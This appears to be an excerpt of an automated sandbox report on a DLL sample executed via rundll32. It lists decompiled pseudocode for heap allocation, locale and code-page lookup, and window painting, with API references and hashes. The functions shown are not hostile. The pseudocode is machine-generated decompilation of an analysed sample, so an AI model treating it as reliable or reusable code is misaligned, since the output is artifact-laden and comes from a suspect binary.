0x00186025
0x0018602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00186025

Memory Dump Source

Source File: 00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp, Offset: 00180000, based on PE: true

Associated: 00000008.00000002.2089487454.0000000000180000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2089525813.000000000019C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: fb53939ece554e03da076b0b75f6af9d1333fca1417ba060d44084b7b2aca302
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 8AF04FB0C11208FFDF08DFA0E94689EBFB9EB50300F208198E409A7260E7715F559F54

Uniqueness

Uniqueness Score: -1.00%

Function 10024214, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10024214(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E1002449E(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x1004e624, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E1002E493();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E10010107(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x1002421a
0x10024220
0x10024252
0x10024257
0x1002425d
0x00000000
0x1002425d
0x10024224
0x10024226
0x10024226
0x1002423d
0x10024246
0x1002424e
0x00000000
0x00000000
0x1002422e
0x10024230
0x00000000
0x00000000
0x10024239
0x1002423b
0x00000000
0x00000000
0x1002423b
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,7248FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e01005b422e904f5de0f4a74a71fcacc2905bcfe713e71daf336211572b189cc
Instruction ID: 48365c050a20ae6f6e82cadb15bda1ead02787d9cc2971144663992c1c58e65a
Opcode Fuzzy Hash: e01005b422e904f5de0f4a74a71fcacc2905bcfe713e71daf336211572b189cc
Instruction Fuzzy Hash: EFE06535640261D6E625EB67BD0174B3BF8EF823E0FD30160FE649A0D5DF64DC0495A5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 100303BF, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E100303BF(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t77;
				intOrPtr* _t84;
				short* _t86;
				intOrPtr* _t91;
				intOrPtr* _t95;
				short _t113;
				void* _t114;
				intOrPtr* _t116;
				intOrPtr _t119;
				signed int* _t120;
				intOrPtr* _t123;
				signed short _t125;
				int _t127;
				void* _t131;
				signed int _t132;

				_push(__ecx);
				_push(__ecx);
				_t84 = _a4;
				_t33 = E10023FB6(__ecx, __edx);
				_t113 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t123 = _t3;
				_t4 = _t123 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t123 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t123 + 4; // 0x54
				_t116 = _t6;
				_v8 = _t34;
				_t91 = _t84;
				_t35 = _t84 + 0x80;
				 *_t123 = _t84;
				 *_t116 = _t35;
				if( *_t35 != 0) {
					E10030352(0x10045ee8, 0x16, _t116);
					_t91 =  *_t123;
					_t131 = _t131 + 0xc;
					_t113 = 0;
				}
				_push(_t123);
				if( *_t91 == _t113) {
					E1002FC7D(_t91);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t116)) == _t113) {
						E1002FD9D();
					} else {
						E1002FD04(_t91);
					}
					if( *((intOrPtr*)(_t123 + 8)) == 0) {
						_t77 = E10030352(0x10045bd8, 0x40, _t123);
						_t131 = _t131 + 0xc;
						if(_t77 != 0) {
							_push(_t123);
							if( *((intOrPtr*)( *_t116)) == 0) {
								E1002FD9D();
							} else {
								E1002FD04(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t123 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t84 + 0x100;
					if( *_t84 != 0 ||  *_t38 != 0) {
						_t39 = E100301C9(_t38, _t123);
					} else {
						_t39 = GetACP();
					}
					_t125 = _t39;
					if(_t125 == 0 || _t125 == 0xfde8 || IsValidCodePage(_t125 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t125;
						}
						_t119 = _a12;
						if(_t119 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t95 = _v8;
							_t15 = _t119 + 0x120; // 0xd0
							_t86 = _t15;
							 *_t86 = 0;
							_t16 = _t95 + 2; // 0x2
							_t114 = _t16;
							do {
								_t45 =  *_t95;
								_t95 = _t95 + 2;
							} while (_t45 != _v12);
							_t18 = (_t95 - _t114 >> 1) + 1; // -1
							_t47 = E1002FBCB(_t86, 0x55, _v8);
							_t132 = _t131 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E1000E341();
								asm("int3");
								_t130 = _t132;
								_t50 =  *0x1004d054; // 0x940b3682
								_v52 = _t50 ^ _t132;
								_push(_t86);
								_push(_t125);
								_push(_t119);
								_t52 = E10023FB6(_t97, _t114);
								_t87 = _t52;
								_t120 =  *(E10023FB6(_t97, _t114) + 0x34c);
								_t127 = E10030B18(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t127, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E1003880F(_t120, _t127,  *((intOrPtr*)(_t87 + 0x54)),  &_v272) == 0 && E10030C4A(_t127) != 0) {
										 *_t120 =  *_t120 | 0x00000004;
										_t120[2] = _t127;
										_t120[1] = _t127;
									}
									_t62 =  !( *_t120 >> 2) & 0x00000001;
								} else {
									 *_t120 =  *_t120 & _t56;
									_t62 = _t56 + 1;
								}
								return E100037EA(_t62, _v32 ^ _t130, _t114);
							} else {
								if(E1002A1D1(_t86, 0x1001, _t119, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t119 + 0x80; // 0x30
									_t86 = _t20;
									_t21 = _t119 + 0x120; // 0xd0
									if(E1002A1D1(_t21, 0x1002, _t86, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t68 = E10041C3B(_t97);
										_t97 = _t86;
										if(_t68 != 0) {
											L31:
											_t22 = _t119 + 0x120; // 0xd0
											if(E1002A1D1(_t22, 7, _t86, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t73 = E10041C3B(_t97);
											_t97 = _t86;
											if(_t73 == 0) {
												L32:
												_t119 = _t119 + 0x100;
												if(_t125 != 0xfde9) {
													E10038569(_t97, _t125, _t119, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t72 = E1002FBCB(_t119, 0x10, L"utf8");
													_t132 = _t132 + 0x10;
													if(_t72 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,7248FFF6,?,1000F7D4,7248FFF6,?,00000000,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10024059

GetACP.KERNEL32(?,?,?,?,?,?,10025264,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 10030480
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,10025264,?,?,?,00000055,?,-00000050,?,?), ref: 100304AB
_wcschr.LIBVCRUNTIME ref: 1003053F
_wcschr.LIBVCRUNTIME ref: 1003054D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 1003060E

Strings

utf8, xrefs: 1003057D

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 75ced19ce70953ca1f26dd45113d273372e98ffb565c56be818b802edc0bfbfe
Instruction ID: b55e07c89fb835d358cde5702a7072b0253a21d250fe5499c22d51fbea95a080
Opcode Fuzzy Hash: 75ced19ce70953ca1f26dd45113d273372e98ffb565c56be818b802edc0bfbfe
Instruction Fuzzy Hash: 7D711675A02606AFE716DB35DC52BAB73E8EF49382F114439FA45DF181EB70EA408760

Uniqueness

Uniqueness Score: -1.00%

Function 10030B69, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E10030B69(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E1000FF85(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,10030E87,00000002,00000000,?,?,?,10030E87,?,00000000), ref: 10030C02
GetLocaleInfoW.KERNEL32(?,20001004,10030E87,00000002,00000000,?,?,?,10030E87,?,00000000), ref: 10030C2B
GetACP.KERNEL32(?,?,10030E87,?,00000000), ref: 10030C40

Strings

OCP, xrefs: 10030BBD
ACP, xrefs: 10030B87

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 9307766cf3f7ef350b833b5ae7400d82360007ee80431dcbf2b3d6834d8a2fd9
Instruction ID: 7366726ca8dfa1b6abe0b51d376a4784dd352efd1aa5aec34e5175226514a72e
Opcode Fuzzy Hash: 9307766cf3f7ef350b833b5ae7400d82360007ee80431dcbf2b3d6834d8a2fd9
Instruction Fuzzy Hash: 1921A472612105AFE726CF15C960A8BB2E6EF44AE6F538164F909DF215E732DD41C350

Uniqueness

Uniqueness Score: -1.00%

Function 10030D3E, Relevance: 7.7, APIs: 5, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E10030D3E(void* __ecx, void* __edx, void* __eflags, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t86;
				short* _t89;
				short** _t99;
				short* _t100;
				signed int _t101;
				signed short _t104;
				signed int _t105;
				void* _t106;

				_t39 =  *0x1004d054; // 0x940b3682
				_v8 = _t39 ^ _t105;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E10023FB6(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E10023FB6(__ecx, __edx);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[1]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x10045ffc; // 0x17
					E10030CDD(_t89, 0, 0x10045ee8, _t83 - 1, _t99);
					_t46 = _v24;
					_t106 = _t106 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t97;
					if(__eflags == 0) {
						goto L19;
					}
					E10030661(_t89, _t97, __eflags,  &_v20);
					_pop(_t89);
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0) {
						L8:
						E10030765(_t89, _t97, __eflags,  &_v20);
						L9:
						_pop(_t89);
						if(_v20 != 0) {
							_t100 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t104 = E10030B69(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
							__eflags = _t104;
							if(_t104 == 0) {
								L22:
								_t53 = 0;
								L23:
								return E100037EA(_t53, _v8 ^ _t105, _t97);
							}
							_t55 = IsValidCodePage(_t104 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t104;
							}
							E1002A393(_v16,  &(_v24[0x94]), 0x55, _t100);
							__eflags = _t86;
							if(_t86 == 0) {
								L34:
								_t53 = 1;
								goto L23;
							}
							_t33 =  &(_t86[0x90]); // 0xd0
							E1002A393(_v16, _t33, 0x55, _t100);
							_t64 = GetLocaleInfoW(_v16, 0x1001, _t86, 0x40);
							__eflags = _t64;
							if(_t64 == 0) {
								goto L22;
							}
							_t36 =  &(_t86[0x40]); // 0x30
							_t66 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t66;
							if(_t66 == 0) {
								goto L22;
							}
							_t38 =  &(_t86[0x80]); // 0xb0
							E10038569(_t38, _t104, _t38, 0x10, 0xa);
							goto L34;
						}
						_t73 =  *0x10045ee4; // 0x41
						_t75 = E10030CDD(_t89, _t97, 0x10045bd8, _t73 - 1, _v24);
						_t106 = _t106 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0) {
							L14:
							E10030765(_t89, _t97, __eflags,  &_v20);
							L15:
							_pop(_t89);
							goto L21;
						}
						_t119 =  *_t76;
						if( *_t76 == 0) {
							goto L14;
						}
						E100306CA(_t89, _t97, _t119,  &_v20);
						goto L15;
					}
					_t115 =  *_t70 - _t97;
					if( *_t70 == _t97) {
						goto L8;
					}
					E100306CA(_t89, _t97, _t115,  &_v20);
					goto L9;
				}
			}

0x10030d46
0x10030d4d
0x10030d54
0x10030d58
0x10030d5c
0x10030d6a
0x10030d6f
0x10030d70
0x10030d71
0x10030d72
0x10030d7a
0x10030d7c
0x10030d82
0x10030d88
0x10030d8b
0x10030d8d
0x10030d90
0x10030d94
0x10030d9b
0x10030da8
0x10030dad
0x10030db0
0x10030db3
0x10030db3
0x10030db5
0x10030db8
0x10030dbc
0x10030e2c
0x10030e2e
0x10030e30
0x10030e43
0x10030e43
0x10030e4a
0x10030e50
0x10030e53
0x00000000
0x10030e53
0x10030e32
0x10030e35
0x00000000
0x00000000
0x10030e3b
0x10030e40
0x00000000
0x10030dc3
0x10030dc3
0x10030dc7
0x10030dd9
0x10030ddd
0x10030de2
0x10030de6
0x10030de7
0x10030e6f
0x10030e6f
0x10030e71
0x10030e7d
0x10030e87
0x10030e8b
0x10030e8d
0x10030e5e
0x10030e5e
0x10030e60
0x10030e6e
0x10030e6e
0x10030e93
0x10030e99
0x10030e9b
0x00000000
0x00000000
0x10030ea2
0x10030ea8
0x10030eaa
0x00000000
0x00000000
0x10030eac
0x10030eaf
0x10030eb1
0x10030eb3
0x10030eb3
0x10030ec4
0x10030ec9
0x10030ecb
0x10030f2b
0x10030f2d
0x00000000
0x10030f2d
0x10030ed0
0x10030eda
0x10030eea
0x10030ef0
0x10030ef2
0x00000000
0x00000000
0x10030efa
0x10030f09
0x10030f0f
0x10030f11
0x00000000
0x00000000
0x10030f1b
0x10030f23
0x00000000
0x10030f28
0x10030ded
0x10030dfc
0x10030e01
0x10030e06
0x10030e56
0x10030e56
0x10030e56
0x10030e58
0x10030e5c
0x00000000
0x00000000
0x00000000
0x10030e5c
0x10030e08
0x10030e0a
0x10030e0e
0x10030e20
0x10030e24
0x10030e29
0x10030e29
0x00000000
0x10030e29
0x10030e10
0x10030e13
0x00000000
0x00000000
0x10030e19
0x00000000
0x10030e19
0x10030dc9
0x10030dcc
0x00000000
0x00000000
0x10030dd2
0x00000000
0x10030dd2

APIs

Part of subcall function 10023FB6: GetLastError.KERNEL32(?,7248FFF6,?,1000F7D4,7248FFF6,?,00000000,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10023FBB
Part of subcall function 10023FB6: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10024059

Part of subcall function 10023FB6: _free.LIBCMT ref: 10024018
Part of subcall function 10023FB6: _free.LIBCMT ref: 1002404E

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 10030E4A
IsValidCodePage.KERNEL32(00000000), ref: 10030E93
IsValidLocale.KERNEL32(?,00000001), ref: 10030EA2
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 10030EEA
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 10030F09

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: e652cf197484474aa77ee004c84c2ce9e9808f2ca160c0f0c27b475b69f1c72a
Instruction ID: 5d274e936d606ac0d18be7e6a8d0ab20f0ec1e67d6cbe38ebf8b77e0045353eb
Opcode Fuzzy Hash: e652cf197484474aa77ee004c84c2ce9e9808f2ca160c0f0c27b475b69f1c72a
Instruction Fuzzy Hash: 8951B171A01219AFEB02DFA5CD51AAEB3F8EF09742F010869F914EF151E771EA40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000168B, Relevance: 96.6, APIs: 54, Strings: 1, Instructions: 309
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000168B(struct HWND__* _a4) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				struct tagPAINTSTRUCT _v120;
				struct HRGN__* _v124;
				struct HDC__* _v128;
				int _v132;
				struct tagPOINT _v140;
				struct HWND__* _v144;
				struct HWND__* _v148;
				signed int _v152;
				void* _v156;
				struct HWND__* _v160;
				struct tagPOINT _v168;
				void* __ebp;
				signed int _t82;
				signed int _t97;
				long _t99;
				struct HBRUSH__* _t107;
				void* _t119;
				void* _t120;
				void* _t130;
				struct HRGN__* _t141;
				struct HRGN__* _t144;
				struct HWND__* _t152;
				int _t153;
				int _t156;
				void* _t159;
				struct HMENU__* _t160;
				struct HRGN__* _t162;
				int _t164;
				struct HRGN__* _t169;
				struct HDC__* _t170;
				void* _t171;
				struct HDC__* _t172;
				struct HDC__* _t173;
				struct HDC__* _t177;
				signed int _t178;

				_t82 =  *0x1004d054; // 0x940b3682
				_v8 = _t82 ^ _t178;
				_t152 = _a4;
				_v156 = _t152;
				_v148 = 0;
				_v144 = 0;
				GetClientRect(_t152,  &_v24);
				_t160 = GetSubMenu(GetMenu(_t152), 1);
				_v132 = _t160;
				if((GetMenuState(_t160, 0xca, 0) & 0x00000008) == 0) {
					_v160 = 0;
					_t169 = CreateRectRgnIndirect( &_v24);
					CombineRgn(_t169, _t169,  *0x1004dbcc, 4);
					if( *0x1004dc35 != 0) {
						_v140.x = 0;
						_v140.y = 0;
						MapWindowPoints(_t152, 0,  &_v140, 1);
						OffsetRgn(_t169, _v140, _v140.y);
					}
					_t170 = GetDCEx(_t152, _t169, 0x42);
					_v128 = _t170;
					SendMessageA(_t152, 0x14, _t170, 0);
					ValidateRect(_t152, 0);
				} else {
					_v160 = 1;
					_t170 = BeginPaint(_t152,  &_v120);
					_v128 = _t170;
				}
				_v124 = SaveDC(_t170);
				_t97 = GetMenuState(_t160, 0xcd, 0) & 0x00000008;
				_v152 = _t97;
				if(_t97 != 0) {
					asm("movd xmm0, dword [ebp-0x8]");
					asm("cvtdq2pd xmm0, xmm0");
					asm("movsd");
					asm("movsd");
					asm("mulsd xmm0, [0x10042370]");
					asm("movsd");
					asm("cvttsd2si eax, xmm0");
					asm("movsd");
					asm("movd xmm0, dword [ebp-0x18]");
					asm("cvtdq2pd xmm0, xmm0");
					_v40.top = _t97;
					asm("mulsd xmm0, [0x10042380]");
					asm("cvttsd2si eax, xmm0");
					_v40.bottom = _t97;
					_t144 = CreateEllipticRgnIndirect( &_v40);
					_t177 = _v128;
					_v144 = _t144;
					SelectClipRgn(_t177, _t144);
					SetMetaRgn(_t177);
					_t160 = _v132;
				}
				_t99 = GetMenuState(_t160, 0xcc, 0) & 0x00000008;
				_v140.y = _t99;
				if(_t99 != 0) {
					asm("movd xmm0, dword [ebp-0xc]");
					asm("cvtdq2pd xmm0, xmm0");
					asm("movsd");
					asm("movsd");
					asm("mulsd xmm0, [0x10042370]");
					asm("movsd");
					asm("cvttsd2si eax, xmm0");
					asm("movsd");
					asm("movd xmm0, dword [ebp-0x2c]");
					asm("cvtdq2pd xmm0, xmm0");
					_v56.left = _t99;
					asm("mulsd xmm0, [0x10042378]");
					asm("cvttsd2si eax, xmm0");
					_v56.right = _t99;
					_t141 = CreateEllipticRgnIndirect( &_v56);
					_v148 = _t141;
					SelectClipRgn(_v128, _t141);
				}
				_t171 = CreateSolidBrush(0x8080ff);
				FillRect(_v128,  &_v24, _t171);
				DeleteObject(_t171);
				_t172 = _v128;
				RestoreDC(_t172, _v124);
				_v124 = CreateRectRgn(0, 0, 0, 0);
				_t107 = CreateSolidBrush(0xff);
				_v132 = _t107;
				if( *0x1004dc35 == 0) {
					_t162 = _v124;
				} else {
					_v168.x = 0;
					_v168.y = 0;
					MapWindowPoints(0, _t152,  &_v168, 1);
					_t162 = _v124;
					OffsetRgn(_t162, _v168, _v168.y);
					_t107 = _v132;
				}
				FrameRgn(_t172, _t162, _t107, 3, 3);
				DeleteObject(_v132);
				DeleteObject(_v124);
				_t173 = GetDC(_t152);
				if(_v152 != 0) {
					_v132 = SaveDC(_t173);
					SelectClipRgn(_t173, _v144);
					SetMetaRgn(_t173);
					_t130 = CreatePen(0, 1, 0x800080);
					_v124 = _t130;
					SelectObject(_t173, _t130);
					_t156 = _v24.top;
					if(_t156 < _v24.bottom) {
						_t153 = _t156;
						do {
							MoveToEx(_t173, 0, _t153, 0);
							LineTo(_t173, _v24.right, _t153);
							_t153 = _t153 + 0xa;
						} while (_t153 < _v24.bottom);
						_t152 = _v156;
					}
					RestoreDC(_t173, _v132);
					DeleteObject(_v124);
					DeleteObject(_v144);
				}
				if(_v140.y != 0) {
					SelectClipRgn(_t173, _v148);
					_t119 = CreatePen(0, 1, 0xff0000);
					_v156 = _t119;
					_t120 = SelectObject(_t173, _t119);
					_t164 = _v24.left;
					_v140.y = _t120;
					if(_t164 < _v24.right) {
						do {
							MoveToEx(_t173, _t164, 0, 0);
							LineTo(_t173, _t164, _v24.bottom);
							_t164 = _t164 + 0xa;
						} while (_t164 < _v24.right);
						_t120 = _v140.y;
					}
					SelectObject(_t173, _t120);
					DeleteObject(_v156);
					SelectClipRgn(_t173, 0);
					DeleteObject(_v148);
				}
				ReleaseDC(_t152, _t173);
				if(_v160 == 0) {
					ReleaseDC(_t152, _v128);
				} else {
					EndPaint(_t152,  &_v120);
				}
				return E100037EA(0, _v8 ^ _t178, _t159);
			}

APIs

GetClientRect.USER32 ref: 100016BD
GetMenu.USER32 ref: 100016C4
GetSubMenu.USER32 ref: 100016CD
GetMenuState.USER32(00000000,000000CA,00000000), ref: 100016DF
BeginPaint.USER32(?,?), ref: 100016F8
CreateRectRgnIndirect.GDI32(?), ref: 10001712
CombineRgn.GDI32(00000000,00000000,00000004), ref: 10001724
MapWindowPoints.USER32 ref: 1000174C
OffsetRgn.GDI32(00000000,?,?), ref: 1000175F
GetDCEx.USER32 ref: 10001769
SendMessageA.USER32 ref: 1000177A
ValidateRect.USER32(?,00000000), ref: 10001783
SaveDC.GDI32(00000000), ref: 1000178A
GetMenuState.USER32(00000000,000000CD,00000000), ref: 1000179B
CreateEllipticRgnIndirect.GDI32(?), ref: 100017EA
SelectClipRgn.GDI32(?,00000000), ref: 100017FB
SetMetaRgn.GDI32(?), ref: 10001802
GetMenuState.USER32(00000000,000000CC,00000000), ref: 10001813
CreateEllipticRgnIndirect.GDI32(?), ref: 10001862
SelectClipRgn.GDI32(?,00000000), ref: 10001872
CreateSolidBrush.GDI32(008080FF), ref: 10001883
FillRect.USER32(?,?,00000000), ref: 1000188F
DeleteObject.GDI32(00000000), ref: 10001896
RestoreDC.GDI32(?,?), ref: 100018A3
